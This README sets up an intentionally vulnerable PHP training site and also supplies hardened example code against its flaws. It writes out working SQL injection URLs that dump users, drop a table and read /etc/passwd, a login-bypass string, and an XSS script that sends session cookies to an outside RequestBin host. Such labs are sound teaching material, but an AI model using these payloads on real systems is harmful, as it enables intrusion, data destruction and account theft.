A collection of common web programming mistakes.
This website, when set up and configured, contains a number of vulnerabilities that can be exploited, including:
- SQL Injection
- XSS (Cross-Site Scripting)
- Session Hijacking
You'll need to have a web server installed and configured with PHP for this to work. I really recommend XAMPP, especially for Windows users. Once you've done that you can proceed.
You'll also need Node.js and npm installed and working.
Clone the project down and open the folder in your favourite editor. It's a JetBrains PhpStorm project but you can use whichever paid/free software takes your fancy.
First, install the npm packages necessary to build and run the website. Run the following in your terminal in the project root directory:
npm install
This will install Bower which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:
bower install
Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:
gulp
This command will need running again every time you make a change to a Less file. If you're working on them, run gulp watch in a terminal to watch for file changes and compile accordingly.
To set everything up, you'll need to:
- Import the file db.sql into your database
- Modify the file db_configuration.php to correspond to your database
- Access the site and get hacking
Examples of vulnerabilities in this web application include:
In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).
- Get information for all users:
http://localhost/customers.php?username=leocadio'%20or%20'1'='1
http://localhost/customers.php?username=leocadio'%20or%20''='
http://localhost/customers.php?id=1%20or%201=1
- Drop (destroy) invoices table:
http://localhost/customers.php?id=1;drop%20table%20invoices
- Dump the password hash file from the server:
- Unix:
http://localhost/customers.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1
- Dump several things at once (oh boy):
http://localhost/customers.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:
foo' or '1'='1
Using a service like RequestBin it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }} substituted out for your RequestBin bin ID).
<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
xmlHttp.send(null);
</script>
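As an added, defensive counterpart to the three attacks above (this is example code, not part of the original project), here are hardened versions of the customer lookup, the login check and the session setup in PHP. The PDO handle and the table and column names are assumptions, not taken from db.sql or db_configuration.php.

```php
<?php
// Added example, not the project's own code. The PDO handle and the table and
// column names (customers, users, username, password_hash) are assumptions, not
// taken from the project's db.sql or db_configuration.php.

// The payloads above work because the value is spliced into the SQL text
// ("... WHERE username = '$username'"). A prepared statement sends the value
// separately, so quotes, OR and UNION are just characters inside the parameter.
function findCustomersByUsername(PDO $db, string $username): array
{
    $stmt = $db->prepare('SELECT id, username, email FROM customers WHERE username = :u');
    $stmt->execute([':u' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Numeric id: validate the shape, then bind as an integer. "1 or 1=1" and
// "1;drop table invoices" fail ctype_digit() and are rejected outright.
function findCustomerById(PDO $db, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, username, email FROM customers WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Login: the password never enters the SQL. The hash is fetched by username and
// checked with password_verify(), so "foo' or '1'='1" is compared as a literal.
function login(PDO $db, string $username, string $password): bool
{
    $stmt = $db->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password_hash']);
}

// Output encoding for the messages page: a stored <script> payload is shown as
// text instead of running in the recipient's browser.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// HttpOnly stops document.cookie from reading the session id, so even an
// injected script cannot exfiltrate it. Must run before session_start().
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();
```

The secure flag assumes the lab is served over HTTPS; on a plain-HTTP XAMPP install the browser will not send the cookie at all, so drop that flag there.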
This site is intentionally left vulnerable to common exploits. Don't host it on the same server as any production sites, only ever deploy it on a machine that you wouldn't mind bricking (I recommend a disposable VM).
This is heavily based on the php-sploits repository by Jared Mooring and Allan Shone. Find the slides for their SydPHP talk here.
The homepage template is a highly modified version of the Blackrock Digital Freelancer template. Wonderful, free, MIT licensed template. Check it out if you're in the market for such a thing.